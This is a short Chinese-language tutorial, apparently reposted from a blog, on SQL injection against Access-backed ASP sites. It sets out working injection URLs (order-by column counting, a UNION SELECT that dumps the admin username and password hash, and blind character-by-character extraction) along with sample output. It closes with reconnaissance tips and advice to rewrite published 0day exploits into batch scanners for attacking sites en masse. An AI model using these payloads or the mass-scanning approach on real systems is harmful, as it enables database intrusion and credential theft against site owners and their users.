Sql注入基础_access注入

1.access注入攻击片段-联合查询

2.access注入攻击片段-逐字猜解法

3.Access偏移注入(表名和列名猜解成功率不是百分百,猜解不到

access注入攻击片段-联合查询法

判断注入

猜解表名

猜解列名

猜解数据

Order by 22 22 代表查询的列名的数目有22

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误



猜解表名 确定存在admin表名

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

爆出3,5

 

 

名称: 3
介绍: 15

 


猜解列名 猜解数据(在3和15位置上填入可能存在的列名)

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin

 

爆出帐号密码

 

名称: a48e190fafc257d3
介绍: admin

 

 

2.access注入攻击片段-逐字猜解法

查表:and exists (select * from 表名)

查列:and exists (select 列名from 表名)

查数据:1.确定长度 2.确定asc数据(asc编码)

and (select top 1 len(列名) from admin)=5

and (select top 1 asc(mid(列名,位数,1)) from admin)=97

and (select top 1 asc(mid(列名,位数,1)) from admin)=97



Admin

Adminpassword

Admin列名长度为5

Password 列名长度为16

3.access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名

 https://www.cnblogs.com/habi/articles/7837565.html

旁注查询,子域名查询


旁注查询:同服务器下不同的站点,寻找查询接口

http://dns.aizhan.com/www.whxy.net/


子域名查询:

分为二级或三级域名,可能存在同服务器或同网段

搜索引擎查询,暴力猜解(layersubDomainsBrute等)

www.0day5.com,可以上这个网站看看最新的oday ,改写里面的exp改成批量扫描的,批量扫站

 

 

 

 

原文地址:https://www.cnblogs.com/cui0x01/p/8620411.html